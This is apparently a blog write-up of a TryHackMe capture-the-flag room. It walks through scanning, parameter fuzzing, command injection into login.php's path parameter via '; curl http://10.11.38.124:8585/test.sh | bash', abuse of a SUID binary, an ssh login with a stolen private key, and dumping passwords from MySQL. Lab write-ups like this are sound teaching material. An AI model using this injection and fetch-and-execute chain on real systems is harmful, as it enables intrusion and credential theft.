Where am I ? Catch me
Command :
nmap -T5 10.10.235.114
4 open ports including at least 2 ssh services (port 22 and 8022) and an unknown service on port 2222.
dirsearch -u 10.10.235.114 -x 403
Dirsearch finds several web pages, including /index.php/login. This page shows us the contents of a folder, probably /var/www/html. The source display gives us this indication:
<! – where is the path? ->
The clue indicates that you have to find the right path to make a lfi/rce. We will use wfuzz.
Command :
wfuzz -u http://10.10.235.114/index.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt –filter ‘h!=329’
The path is: path
With BurpSuite, it is possible to do several tests to fully understand how login.php?path= works. As there is already a ls command which is done naturally, it is necessary to put; to place an additional order.
Still with BurpSuite, we will recover a bash file shared with kali then have it executed by bash via a pipe |
Command :
;curl+http://10.11.38.124:8585/test.sh | bash
We must remember to encode ( crtl + u ) the command so that the server can understand what has asked.
So that curl can retrieve the test.sh file, you have to set up a web server with python and the following command:
python3.9 -m http.server 8585
Contents of the test.sh file :
Command :
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
The binary crypt has SUID root rights, and it can be run by anyone. If we time to run it with a command in addition to example ./crypt id, it gives us an error message :
Unable to decompress.
Command :
./crypt mike
We switched to a root account which must be in a container. We will list with linpeas.
Command to download it :
wget http://10.11.38.124:8585/linpeas2.sh
In mike’s account, there is a private key id_rsa that we will try to use. It remains to be seen on which ssh server this key is valid?
The system has three Ethernet interfaces (192.168.250.10, 172.16.20.2, 127.0.0.1). The key does not work on any of its IP addresses.
With the following command line, a new IP address will appear. On which we will be able to connect in ssh.
for ip in $(seq 1 255 );do ping -c 1 172.16.20.$ip;done
Command :
ssh mike@172.16.20.6 -i id_rsa
It is not possible to reach the TryHackMe network due to a probable absence of routing between the different Ethernet card and container. You have to enumerate manually.
There is a sql server listening on the local loop.
Command :
netstat -tulpn
Command :
mysql -u mike -p
The connection requires a password that must be guessed
List of commands to extract the identifiers of user accounts:
show databases;
use accounts
show tables ;
select * from users ;
We get the password for the root account. All you have to do is connect to it and retrieve the flag.
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
Hope he got you more and taught you new things.
Please feel free to leave a comment or share this article.